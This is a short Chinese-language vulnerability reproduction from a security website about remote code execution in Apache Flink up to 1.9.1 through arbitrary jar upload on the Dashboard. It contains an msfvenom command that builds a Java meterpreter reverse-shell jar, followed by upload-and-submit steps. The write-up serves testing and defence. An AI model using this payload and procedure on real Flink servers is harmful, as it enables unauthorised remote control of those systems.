Apache Flink 任意 Jar 包上传致 RCE

华盟原创文章投稿奖励计划

漏洞概述:


Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能;漏洞影响:至目前最新版本Apache Flink 1.9.1;攻击者可直接在Apache Flink Dashboard页面中上传任意jar包,从而达到远程代码执行的目的

环境:
下载http://mirrors.tuna.tsinghua.edu ... -bin-scala_2.11.tgz

Apache Flink 任意 Jar 包上传致 RCE 

解压后访问8081端口

Apache Flink 任意 Jar 包上传致 RCE

Apache Flink 任意 Jar 包上传致 RCE

msfvenom -p java/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f jar > rce.jar

上传后点击 Submit

Apache Flink 任意 Jar 包上传致 RCE

华盟知识星球入口

Apache Flink 任意 Jar 包上传致 RCE

本文原创,作者:张,其版权均为华盟网所有。如需转载,请注明出处:https://www.77169.net/html/246120.html

发表评论